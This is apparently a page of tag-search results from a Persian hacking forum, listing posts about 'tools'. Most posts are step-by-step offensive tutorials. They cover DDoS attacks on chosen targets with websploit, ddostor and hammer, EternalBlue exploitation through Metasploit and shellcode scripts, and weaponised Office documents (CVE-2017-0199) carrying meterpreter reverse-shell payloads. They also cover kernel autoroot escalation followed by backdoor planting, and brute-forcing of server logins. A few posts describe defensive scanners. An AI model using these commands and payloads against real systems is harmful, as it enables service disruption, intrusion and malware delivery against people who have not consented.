امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'ابزار'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

60 نتیجه پیدا شد

  1. یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  2. Black_petya

    Hacking-Ddos

    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  3. Black_petya

    Hacking-Ddos

    یکی از بهترین ابزار های حمله دیداس ابزار hammer میباشد که اکثر هکر ها در لینوکس از این ابزار استفاده میکنند . خب برای نصب این ابزار ابتدا باید دستور زیر را در لینوکس خود بنویسید تا ابزار دانلود شود : git clone https://github.com/cyweb/hammer.git بعد از دانلود شدن ابزار با دستور cd به دایرکتوری فایل بروید و با دستور زیر اقدام اجرا ابزار کنید python3 hammer.py با دستورات زیر تارگت خود را انتخواب کنید : python3 hammer.py -s (iptarget) -p (port target) با دستور بالا میتوانید حمله داس را اجرا کنید شما به جای (iptarget) ایپی تارگت خود و به جای (port target) پورت تارگت خود را بدید معوملا پورت 80 هست ! امید وارم خوشتان امده باشد
  4. gD0rk - Google Hack the Dork Automatic Database Tool. gD0rk is a free and open source scanner. Evolved from Google search engine, it has adapted several new features that improve functionality and usability. It is mostly experimental software. The GHDB is an index of search queries (we call them dorks) used to find publicly available information, intended for pentesters and security researchers. Installation Clone the repository: $ git clone GitHub - dwisiswant0/gD0rk: Google Hack Database dork automatic tool. Then go inside: $ cd gD0rk And install it with composer: $ composer install Recommended PHP Version: gD0rk required PHP 5+, and is currently tested on PHP 7.0.23-1 (CLI). Usage $ php gd0rk.php -d "inurl: index.php? id = ext: php" -p "127.0.0.1:9050" Startup: -d DORK DORK for searching. Optional arguments: -h, --help print this help. -p PROXY surf with PROXY. -o FILE log results to FILE. -v, --verbose shows details about the results of surfing. Help & Bugs If you are still confused or found a bug, please open the issue. All bug reports are appreciated, some features License gD0rk is licensed under the MIT. Take a look at the LICENSE for more information. Version Current version is 1.0 (experimental) and still development.
  5. آموزش ابزار روتوش حرفه ای تصاویر در فتوشاپ همراه با فایل های مورد نیاز از persiangfx.com قیمت : ۲۰،۰۰۰ تومان Ultimate.Retouch.Package.rar - Telegram File Download Service
  6. ابزار کرک ابزاری که معرفی میکنیم تمامی سرویس های اصلی و مهم سرور را میتوانید بروت فورس کنید قابل نصب در ویندوز میباشد و با استفاده از wine در لینوکس هم میتوان استفاده کرد همچنین میتوانید از پروکسی برای بلاک نشدن ای پی خود در ابزار استفاده کنید امکان کرک سرویس های زیر : FTP HTTP SMTP SNMP VNC SMB SIP POP3 MySql MsSql … عکس های سفت http://uupload.ir/files/627n_captzure.jpg http://uupload.ir/files/ivma_capture.jpg DONLOAD Bruter_1.1.rar - AnonFile GitHub - rednofozi/Bruter-v.1-by-rednofozi: To crack server services by rednofozi BY REDNFOZI
  7. نکته قبل از نصب حتما پایتون نسخه ۳ استفاده نمایید تا به درستی اجرا شود امکانات Admin Finder استفاده از پروکسی تست پارامتر های تصادفی برای جسجو جستجو بیش از ۵۰۰ صفحه امکان بالا بودن سرعت Multithreading امکان افزودن صفحه به ابزار … نصب در لینوکس ابتدا لینک را از اخر صفحه دریافت کنید سپس جایگزین Link در دستور زیر کنید و دستور را اجرا کنید git clone Link بعد از اتمام دانلود وارد پوشه دانلود شده شوید cd okadminfinder3 برای نصب پیشنیاز ها از دستور زیر استفاده نمایید pip3 install -user -r requirements.txt حال سطح دسترسی فایل را بالا ببرید chmod 775 okadminfinder.py حال برای اجرا میتوانید از پایتون ۳ مانند دستور زیر استفاده کنید python3 okadminfinder.py پیکربندی کالی لینوکس برای اتصالات شبکه نحوه استفاده ابتدا برای نبایش سویچ های راهنما از دستور زیر استفاده کنید python3 okadminfinder.py -h برای جستجوی صفحه ادمین از سویچ -u استفاده کنید به طور مثال : python3 okadminfinder.py -u site.com درصورتی که از پروکسی استفاده میکنید میتوانید مانند دستور زیر پروکسی را فعال کنید python3 okadminfinder.py -u target.com –proxy 127.0.0.1:53281 GitHub - mIcHyAmRaNe/okadminfinder3: [ Admin panel finder / Admin Login Page Finder ] ¢σ∂є∂ ву 👻 (❤-❤) 👻
  8. Rednofozi

    Cracking

    ۵ ابزار برتر در زمینه کرک پسورد را معرفی میکنیم. هدف این ابزارها در رمزگشایی کلمات عبور با الگوریتم های رمز گشایی رمز عبور مختلف است. اکثر این ابزار ها، به صورت رایگان در دسترس هستند. بنابراین، همیشه باید سعی کنید یک رمز عبور قوی داشته باشید چون خطر نزدیک است. در سال های اخیر، برنامه نویسان کامپیوتر در حال تلاش برای ایجاد الگوریتم های رمز گشایی پسورد ها بوده اند تا بتوانند در زمان های کمتری ، رمز عبور را بدست بیاورند در عملیات کرک پسورد قالبا از تکنیک brute force استفاده می شود. پس شما براحتی می توانید با استفاده از کاراکترهای کوچک و بزرگ، اعداد و نماد ها ، فرآیند انجام کرک را به هفته و ماه ها برسانید و کمتر هکری حوصله دارد که ماه ها منتظر پسورد یک کاربر باشد. سرعت عملیات کرک پسورد به عوملی مانند طول رشته، تنوع تعداد کاراکتر، نوع الگوریتم رمز نگاری یا هشینگ و قدرت سخت افزاری سیستم بستگی دارد . برای حملات کرک پسورد ما ۳ متد داریم: Dictionary attack : در این حمله از لیستی استفاده میشود که حاوی کلمات فرهنگ لغت و ترکیبی از آنها است Brute force attack : مانند متد قبل است اما فقط به فرهنگ لغت بسنده نمی کند و به ترکیب کارکاتر ها بدون در نظر گرفتن اینکه با معنی یا بی معنی است می پردازد Rainbow table attack : این حمله با استفاده از هش های قبل از محاسبه است و نسبت به ۲ متد قبل، سرعت بالاتری دارد
  9. سرویس های سرور سرور ها برای استفاده و کاربرد بیشتر خود نیاز به سرویس هایی برای خود دارند این و بعضی از این سرویس ها برای سورو واجب است و در همه ان ها نصب است به طور مثال ما چند سرویس مهم در سرور های یک وبسایت را معرفی میکنیم و توضیح ان را به طور خلاصه برای اشنایی با مفهوم ان میدهیم FTP : این سرویس برای انتقال فایل در سرور میباشد که در اکثر سرور های وب استفاده میشود و درصورت امن نبودن میتواند باعث دزدیده شدن فایل های سرور و حتی اپلود فایل شود. ابزار کرک ابزاری که معرفی میکنیم تمامی سرویس های اصلی و مهم سرور را میتوانید بروت فورس کنید قابل نصب در ویندوز میباشد و با استفاده از wine در لینوکس هم میتوان استفاده کرد همچنین میتوانید از پروکسی برای بلاک نشدن ای پی خود در ابزار استفاده کنید امکان کرک سرویس های زیر : FTP HTTP SMTP SNMP VNC SMB SIP POP3 MySql MsSql … ابزار نوشته شد توسط Rednofozi anonysec team ابزار نسخه اول میباشد ابزار نسخه پرو و با امکانت بیشتر برای فروش گذاشته میشه در بخش ابزار های تیم امنیتی و اگر سفارش ساخت هر نوع ابزاری داشتید با ایدی تلکرام Rednofozi در تماس باشید دریافت ابزار Bruter rednofozi1.rar - AnonFile
  10. Rednofozi

    Security

    این ابزار که به تازگی با زبان PHP و بصورت CLI نوشته شده است ، به متخصصین امنیت کمک می کند تا با بررسی هدر های امنیتی HTTP در وبسایت ها از فعال بودن یا نبودن آن اطلاع یابند و در صورت غیرفعال بودن هشدار هایی در مورد خطرات احتمالی ناشی از غیرفعال بودن آن ها و همچنین توصیه های امنیتی برای فعالسازی آن ها را ارائه دهد. هدرهای امنیتی ای که توسط این ابزار بررسی می شود توسط سازمان امنیتی OWASP تحت نام OWASP Secure Header Project معرفی شده است. – لیست هدر های امنیتی ای که توسط این ابزار بررسی می شود : (HTTP Strict Transport Security (HSTS (Public Key Pinning Extension for HTTP (HPKP X-Frame-Options X-XSS-Protection X-Content-Type-Options Content-Security-Policy X-Permitted-Cross-Domain-Policies Referrer-Policy Expect-CT برای اطلاع بیش تر در مورد هر یک از هدر ها به اینجا مراجعه کنید . – از جمله قابلیت های خوب این ابزار ، پشتیبانی از انواع پروکسی ها برای ناشناس ماندن از جمله : Tor Socks5 Http می باشد که به کاربر کمک می کند تا در هنگام استفاده از ابزار ، IP و سایر اطلاعات هویتی را از دید سرور هدف پنهان نماید. – آموزش نصب و استفاده از ابزار هدر های امنیتی http برای اجرا ابزار نیاز به نصب PHP بر روی سیستم خود را خواهید داشت . دانلود PHP برای ویندوز PHP بصورت پیشفرض بر روی توزیع های لینوکس نصب است برای اجرای نرم افزار کافی است پس از نصب PHP دستورات زیر را وارد کنید : در CMD دستور زیر را وارد کنید » Windows php.exe HttpSecurityCheckersHeader.php در ترمینال دستور زیر را وارد کنید » Linux php HttpSecurityCheckersHeader.php برای دریافت و مشاهده ابزار به اینجا مراجعه کنید GitHub - Snbig/HttpSecurityHeadersChecker: Http Security Headers Checker Tool written in PHP Cli + Useful Tips to set Http Security Headers
  11. اسکنر های امنیتی مختلفی را در دنیای iT مشاهده میکنیم که هر کدام از ان ها ضعف و نقاط قوتی دارند اما یکی از مهمترین مشکلات اسکنر های غیر رایگان , گران بودنشان است که بسیاری به همین دلیل یا نمیتوانند از اسکنر ها استفاده کنند یا از نسخه های کرک شده بی کیفیت استفاده میکنند اما اسکنر های رایگانی وجود دارند که بسیار خوب عمل میکنند یکی از این اسکنار های معروف و رایگان اسکنر w3af میباشد این نسخه به قدری محبوب است که در نسخه های قدیمی تر کالی لینوکس وجود داشت اما به دلایلی در نسخه های جدید وجود ندارد حال برای نصب این اسکنر کافیست به صورت دستی در هر سیستم عاملی نصب کنیم که در ادامه با نحه نصب و استفاده از ان اشنا میشویم. سیستم عامل ها قابل نصب در انواع سیستم عامل ها از جمله لینوکس ,مک و ویندوز میباشد امکانات و اموزش w3af امکان استفاده از پروکسی ارسال درخاست های HTTP کش کردن DNS UserAgent اسپوف برسی هدر های امنیتی برسی کوکی ها امکان استفاده از ابزار به دو صورت گرافیکی و کنسول امکان جستحوی باگ های حساس XSS و SQL injection اموزش نصب w3af در لینوکس از بخش دانلود لینک لینوکس را دریافت کنید و جایگزین Link در دستور زیر کنید git clone Link وارد پوشه دانلود شده شوید cd w3af حال برای اجرا برنامه به صورت گرافیکی از دستور زیر استفاده کنید ./w3af_gui درصورتی که میخواهید از محیط کنسول استفاده میکنید دستور زیر را برای اجرا وارد کنید ./w3af_console اموزش نصب w3af در ویندوز از بخش دانلود فایل exe ابزار را دریافت و اقدام به نصب کنید اموزش استفاده در محیط گرافیکی در محیط گرافیکی در قسمت مشخص شده در تصویر ادرس وبسایت مورد نظر را برای اسکن اسیب پذیری وارد کنید و از قسمت پلاگین تیک بخش های مورد نظر برای تست اسیب پذیری را بزنید در صورتی که بخشی را نیاز ندارید تیک را بردارید تا اسکن سریع تر انجام شود همچنین از قسمت profiles انواع اسیب پذیری ها و اسکن های سرور را مشاهده و مناسب با نیاز خود فعال و غیر فعال کنید و از قسمت log پروسه انجام تست اسکنر را مشاهده کنید اموزش w3af در محیط کنسول وارد بخش کنسول شوید و دستور help را وارد کنید سویچ های راهنمای اموزش w3af نشان داده میشود و برای اسکن وب سایت دستور start را وارد کنید , در تصویر زیر سویچ راهنما را مشاهده کنید دانلود ابزار w3af GitHub - andresriancho/w3af: w3af: web application attack and audit framework, the open source web vulnerability scanner. w3af download | SourceForge.net
  12. Rednofozi

    Security

    اکسپلویت نسبتا جدیدی که توسط هکر هایی از سیستم های سازمان NSA دزدیده شد این اکسپلویت با استفاده از اسیب پذیری سرویس SMB ویندوز عمل میکند و باعث اجرای کد از راه دور میشود سرویس های SMB به طور کلی در سیستم عامل فعال هستند و به همین دلیل بسیاری از سیستم های جهانی مورد خطر این اسیب پذیری قرار گرفته اند و باید حتما از اپدیت های امنیتی یا فایل پچ این اسیب پذیری استفاده نمایند چگونه میتوان از اکسپلویت Eternalblue استفاده کرد ؟ امروز که این اسیب پذیری بسیار دیده میشود ابزار هایی برای استفاده راحت از این اکسپلویت ساخته شده است و در ادامه این اموزش چندین ابزار ساده و کاربردی برای این اسیب پذیری را معرفی خواهیم کرد همچنین همراه اموزش استفاده از ان چه سیستم عامل هایی را شامل میشود ؟ Windows XP Windows 2000 Windows 2003 R2 Windows 2008 R2 Windows 2012 R2 Windows 7 SP1 Windows 8.1 Windows 2016 Windows 10 سطح دسترسی با این اکسپلویت میتوانید از راه دور شل کد خود را اجرا کنید و به صورت کامل دسترسی خود را به سیستم مورد نظر بگیرید راه رفع این اسیب پذیری بهرانی استفاده از اپدیت های امنیتی سیستم عامل میباشد همچنین میتونید فایل رف این اسیب پذیری را به صورت جدا گانه دانلود و نصب نمایید نکته از جمله میتوان برای این اسیب پذیری مشکلات بزرگی را مثال زد مانند استفاده بات نت ها و باج افزار ها برای نفوذ و باج گیری همانند باج افزار wannacry که باعث خسارت های بسیاری شد نصب یکی از راه های استفاده از اکسپلویت Eternalblue استفاده از ان در متااسپلویت میباشد که در نسخه جدید ان افزوده شده است در صورت موجود نودن در متااسپلوت متااسپلوست خود را اپدیت نمایید با استفاده از دستور زیر msfupdate اجرای اکسپلویت در متااکسپلویت اجرای متا msfconsole انتخاب اکسپلویت use address/smb/smb_ms17_010 نمایش اطلاعات ست شده options ست کردن ایپی سیستم set rhosts ip_server ست کردن پورت اکسپلویت که به صورت پیشفرض هم موجود است set rport 445 اجرا یا run exploit (همچنین میتوانید به صورت دستی فایل را به متااسپلویت خود اضافه کنید لینک در اخر صفحه میباشد.) اجرای اکسپلویت با ابزار ابزاری عالی برای استفاده از MS17-010 نوشته شده به زبان پاتون و برای سیستم عامل های مختلف دانلود ابزار با استفاده از دستور زیر git clone link چک کردن اسیب پذیر بودن سیستم مورد نظر با استفاده از ایپی سیستم python checker.py ip_server اجرای شل کد بر روی سیستم با استفاده از اکسپلویت python exploit.py ip_server shellcode دانلود کیلاگر و اموزش کیلاگر موجو به زبان فارسی معرفی ابزاری دیگر نشوته شده با زبان ruby لینک در اخر مطلب اجرا با دستور زیر ruby eternalblue_doublepulsar.rb نکته : در استفاده از این اکسپلویت ها پایتون و یا روبی به روی سیستم خود نصب کنید به طور پیشفرض بر روی کالی لینوکس که در تصاویر میبینید نصب میباشد. فایل های ابزار اکسپلویت Eternalblue : GitHub - ElevenPaths/Eternalblue-Doublepulsar-Metasploit GitHub - worawit/MS17-010: MS17-010 GitHub - hanshaze/MS17-010-EternalBlue-WinXP-Win10: EternalBlue Metasploit Port to various Windows Versions from Windows XP SP2 up to Windows 10 Pro
  13. با استفاده از ابزار Decodify میتوانید رمزنگاری های خود را به راحتی هر چه تمام تر دیکد کنید و از ان ها استفاده کنید یا میتوانید از رمزنگاری های این ابزار برای امن سازی خود استفاده نمایید ابزار Decodify توضیح این ابزار به متخصصان هکو امنیت کمک خواهد کرد برای رمزگشایی و رمزگزاری های مهم از ان استفاده کنند همچنین میتوانند بعضی هش های مورد استفاده در بسیاری از دیتابیس ها و … به راحتی کرک کرده از ان استفاده کنند در ادامه با امکانات فوق العاده اسان و کاربردی ان ابزار اشنا خواهیم شد امکانات استفاده از Encodings و Encryptions این ابزار Hex FromChar MD5 Decimal Caesar ciphers SHA1 SHA2 Base64 نصب Decodify ابزار Decodify به راحتی قابل نصب در انواع لینوکس میباشد ما متسفانه قابل نصب در سیستم عامل های دیگر نیست و فقط در لینوکس قابل نصب میباشد ابتدا برای نصب این ابزار دستور زیر و بعد لینک ابزار را از اخر صفحه بعد از ثبت نام یا ورود دریافت کنید git clone Link بعد از دریافت با دستور زیر وارد پوشه دانلود شده شوید cd Decodify و با دستور زیر ان را نصب کنید make install استفاده برای استفاده از این ابزار بعد از نصب کافیست از دستور زیر استفاده کنید و هش یا متن رمز نگاری شده خود ا به ان بدهید اموزش تصویری optimize و monitoring در کالی لینوکس مانند دستور زیر dcode UGVudGVzdENvcmU= برای مشاهده سویچ های این ابزار از دستور زیر استفاده کنید dcode -h نکته امکانات این ابزار فوق العاده در همینجا به اتمام نمیرسد شما میتوانید با استفاده از سویج help که در بالا مشاهده میکنید امکانات بیشتر این ابزار را مطالعه کنید و از ان به صورت کامل بهرهمند شوید دانلود ابزار Decodify GitHub - s0md3v/Decodify: Detect and decode encoded strings, recursively.
  14. Rednofozi

    Kali Linux

    امکانات HTTP Server پشتیبانی از DNS Server پشتیبانی از DHCP Server حملات فیشینگ اکسس پوینت در وایرلس Session Hijacking حملات MITM حملات DOS اتصال به دیتابیس MySQL بروز رسانی ابزار سیستم عامل های قابل نصب توزیع های لینوکس ۱٫ Ubuntu ۲٫ BackTrack Linux ۳٫ BackBox Linux اموزش نصب نصب در لینوکس دبیان dpkg -i ghost-phisher_1.5_all.deb نصب در توزیع های دیگر لینوکس git clone link-git اجرا python ghost.py اجرا در کالی لینوکس دستور زیر ghost-phisher لینک دانلود ابزار Ghost Phisher | Penetration Testing Tools GitHub - savio-code/ghost-phisher: Automatically exported from code.google.com/p/ghost-phisher
  15. ابزار را میتوانید در لینوکس خود نصب و استفاده کنید این ابزار به صورت گرافیکی است و مینوانید در محیط گنو از ان استفاده کنید اما ابزار های دیگری تحت کامند لاین هستند که با دنبال کردن سایت ان هم اموزش داده خواهد شد برای نصب این ابزاره ساده و قوی از دستور زیر میتوانید استفاده کنید apt-get install stegosuite تکته این ابزار این است که متن شما که درون عکس قرار میگیرد با الگریتم بسیار قوی AES رمز نگاری میکند اگر کلید قوی برای ان انتخاب کنید تقریبا نشدنیه شکستن الگریتم بعد از اتمام نصب با دستور زیر یا انتخاب از داخل منو لینوکس خود میتوانید برنامه را اجرا کنید stegosuite <img class="aligncenter" src="https:/anonysec.org/up/upload/stegosuite-image-op-n-t.png" alt="مخفی سازی اطلاعات در عکس Step 1" width="648" height="397"> از قسمت File که در تصویر مشاهده میکنید عکس مورد نظر که میخواهید اطلاعات در ان قرار بگیرد را انتخاب کنید در قسمتی که تست نوشته شده است متن یا دیتای خود را بزارید در قسمتی که عدد نوشته شده پسورد بگزارید تا برای خارج کردن متن از عکس بدون پسورد انجام نشود با انتخاب Embed عکس ترکیب شده ساخته میشود در هنگام باز شدن عکس هیچ تغیری نخواهد کرد اما برای خارج کردن بعد از باز کردن عکس در ابزار دسورد را زده و گزنه Extract را بزنیدتا متن نمایش داده شود
  16. باگ SQL Injection یکی از شایع ترین باگ های موجود است. در این باگ خطرناک هکر دسترسی کامل به دیتابیس میگیرد و می تواند دستورات SQL را از تزریق آنها در URL اجرا کند. وقتی که شما کنترل دیتابیس را دشته باشید هرکاری میتوانید بکنید. از باگ SQL می تواند به مقاصد مختلفی دست پیدا کرد. از بدست آوردن یوزر و پسورد کاربران و ادمین گرفته تا دیفیس کردن و… باگ SQL هیچ ربطی به کمبود امنیت در دیتابیس ندارد و مقصر اصلی به وجود آمدن این باگ برنامه نویس و شخصی که سرور را کانفینگ کرده، است. هرچند که نمی توان به برنامه نویس هم خرده گرفت. چون برنامه نویس که در زمینه امنیت فعالیت نداشته است. هرچند که بهتره داشته باشد اما اگر ندارد هم مشکلی ندارد به دنبال مقصر دوم میرویم. کسی که سرور را کانفیگ کرده یا مدیر اون هاستینگ که سایت روی سرور های آنحا قرار دارد. هاستینگ ها باید به گونه ای عمل کنند که حتی اگر سایتی هم باگ داشت، با قرار دادن اون سایت روی سرور خود اکثر این باگ های شایع بر طرف بشوند. باگ SQL برای تمام دیتابیس ها وجود دارد. پایگاه داده هایی از جمله oracle, Microsoft SQL , mySQL , mariadb و … طی یک تحقیقات که در سال ۲۰۱۷ بر روی ۳۹۶ سایت صورت گرفت ۵۵ سایت داری این آسیب پذیری بودند و این عدد یعنی چیزی حدود ۱۴ درصد که در دنیای هک رقم قابله توجهی است. برای استفاده از باگ SQL injection هکر باید دستورات SQL را در url وارد کند و این نیازمند این است که هکر با دستورات SQL آشنا باشد. باگ sql injection یعنی مقداری نیاز به دانش دارد.اما ابزار های مانند jSQL و SQLmap ساخته شدند که راه را برای دیگر هکر ها آسان کنند. این ابزار ها نیاز به هیچگونه دانشی در زمینه پایگاه داده ندارند و براحتی می توانند به پایگاه داده نفوذ کنند. JSQL یک ابزار بسیار ساده و کاربردی است و شاید به جرات بتوان گفت یکی از ساده ترین ابزار ها برای اجرای باگ SQL است چون محیط تماما گرافیکی دارد. استفاده از jSQL حتی از SQLmap هم بسیار آسان تر است این ابزار سبک و متن باز برای سیستم عامل های ویندوز ، لینوکس، مک ، سولاریس در دسترس است امیدوارم از این آموزش هم لذت برده باشید امنیت را جدی بگیرید شاد و پیروز باشید…
  17. توضیحات ابزار هک با افیس بسیاری از هکر ها برای نفوذ خود در یک سیستم از روش های مختلفی استفاده میکنن که یکی از این روش ها ارسال فایل از مجموعه افیس است یعنی به طور مثال با ارسال فایل .docx که یک فایل ورد است اقدام به هک میکند با اجرای فایل ورد هم ویروس اجرا خواهد شد و هم فایل اصلی ما در این اموزش قصد داریم با استفاده از این اسیب پذیری مجموعه افیس ترکیب فایل مخرب با فایل ورد را اموزش دهیم ابزاری که معرفی خواهیم کرد با استفاده از اسیب پذیری ثبت شده CVE-2017-0199 کار میکند و قادر است به سادگی بدون پیچیدگی زیاد فایل را ترکیب کند امکان کارکرد این اکسپلویت تا مجموعه افیس چه سالی عمل میکند ؟ 2007 ۲۰۱۰ ۲۰۱۳ ۲۰۱۶ امکانات ابزار تست نفوذ با مجموعه افیس امکان استفاده از پسوند .ppsx مکان استفاده از پسوند .doc امکان ترکیب با فایل .exe امکان ترکیب با .hta انتخاب پورت اتصال اجرای ابزار در هر سیستم عامل استفاده در متاسپلویت اموزش نصب و اجرا در ابتدا برای نصب این ابزار لینک دانلود ابزار را از بخش دانلود در اخر اموزش دریافت کنید با دستور زیر وارد پوشه دانلود شده شوید cd CVE-2017-0199 حال در صورتی که پایتون ۲٫۷ رانصب شده دارید با دستور زیر ابزار را اجرا کنید python cve-2017-0199_toolkit.py برای مشاهده سویچ های راهنما از سویچ -h استفاده کنید python cve-2017-0199_toolkit.py -h اموزش ساخت پبلود و استفاده از ابزار برای ترکیب پیلود با مجموعه افیس برای ساخت پبلود با دستور زیر متاسپلویت را اجرا کنید msfconsole و به مسیر اکسپلویت بروید use multi/handler پیلود مورد نظر را انتخاب کنید set PAYLOAD windows/meterpreter/reverse_tcp ای پی سیستم را وارد کنید set LHOST 1127.0.0.1 و با دستور run پیلود ایجاد خواهد شد حال با دستور زیر اکسپلویت را اجرا و بر روی پیلود اعمال کنید دقت داشته باشید در قسمتی که ادرس فایل و ای پی داده شده است ادرس درست سیستم خود را وارد کنید python cve-2017-0199_toolkit.py -M exp -t RTF -e http://127.0.0.1/payload.exe -l /tmp/payload.exe
  18. معرفی ابزاری برای اسکن کردن سایت ها بمنظور یافتن اسیب پذیری sql injection رو به شما عزیزان دارم که این ابزار عملیات اسکن کردن رو برای شما اسون میکنه:) این ابزار که white widow نام دارد به زبان برنامه نویسی روبی نوشته شده و ابزاری کارامد در این زمینه میباشد!!! سپس ان را روی کالی لینوکس خودمون نصب و اقدام به استفاده از اون میکنیم GitHub - WhitewidowScanner/whitewidow: SQL Vulnerability Scanner
  19. Rednofozi

    Hacking

    ابزار Blazy ابزار همه کاره برای حملات بر روی صفحات لاگین ادمین و بایپس ان ها امکانات استفاده اسان اسکن سایت در برابر حملات csrf و Clickjacking بایپس کلود و waf عملکرد بالا بایپس لاگین با SQL injection سرعت بالا نصب ترمینال را باز کنید و دستور زیر را بزنید تا ابزار دانلود شود git clone https://github.com/UltimateHackers/Blazy حالا دستور زیر را وارد کنید تا وارد پوشه شود cd Blazy قبل از اجرا ماژول زیر را نصب کنید pip install -r requirements.txt اجرا ابزار blazy python blazy.py GitHub - s0md3v/Blazy: Blazy is a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF .
  20. Rednofozi

    Hacking

    که یکی ازین ابزار ها که ابزار فوق العاده جالب و کاربردی هم هست ابزار Fsociety نام دارد قسمت های مختلف ابزار رو براتون شرح خواهم داد : Information Gathering Password Attacks Wireless Testing Exploitation Tools Sniffing & Spoofing Web Hacking Private Web Hacking Post Exploitation Contributors Install & Update لینک دریافت GitHub - Manisso/fsociety: fsociety Hacking Tools Pack – A Penetration Testing Framework
  21. Rednofozi

    Hacking

    از نفوذ به یک وبسایت هدف بعدی و هدف اصلی بالا بردن سطح دسترسی در سرور میباشد با بالا بردن سطح دسترسی در سرور میتوان سایت های دیگر ان سرور را دسترسی گرفت خیلی وقت ها ممکن است از سایت هدف نشود باگی پیدا کرد پس هدف سرور ان سایت میشود مثلا در یک سرور ۱۰۰۰ سایت وجود دارد از این هزار سایت یکی از ان ها راه نفوذی پیدا میشود که با استفاده از ان سطح دسترسی خود را بالا برده و وبسایت هدف را مورد حمله قرار میدهیم در قسمت کنسول دسترسی از وبسایت هک شده دستور زیر را بزنید و ببینید دسترسی در حال حاضر شما چه نوعی است id بعد از مطمئن شدن از دسترسی سطح پایین از لینک پایین صفحه ابزار را دانلود کنید ابزار با زبان bash نوشته شده است و در لینوکس قابل اجرا است و همچنین سیستم های مک وانواع توزیع لینوکس ان را در سرور خود دانلود کنید و در قسمت کنسول ان را اجرا کنید ./autoroot.sh قبل از هرچیز ورژن کرنل خود را در بیاورید با دستور زیر uname -a و بعد از فهمیدن ورژن اتو روت را به صورت زیر اجرا کنید 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 for kernel version 2.6 all autoroot.sh 2 for kernel version 3 all autoroot.sh 3 for kernel version 4 all autoroot.sh 4 for freebsd & openbsd all autoroot.sh bsd for apple macos all autoroot.sh app for kernel 2.6,3,4 bsd & app all bash autoroot.sh all روت شدن به سرور ورژن کرنل را هنگام اجرا وارد کنید در غیر این صورت اکسپلویت تمامی ورژن ها تست میشود و مان بیشتری خواهد برد بعد از اتمام کار اگر به سرور روت شده باشید میتوانید روت کیت یا بکدور خود را اجرا کنید در قسمت های بعدی اموزش نصب روت کیت و بکدور سرور اموزش داده خواهد شد
  22. Rednofozi

    Hacking

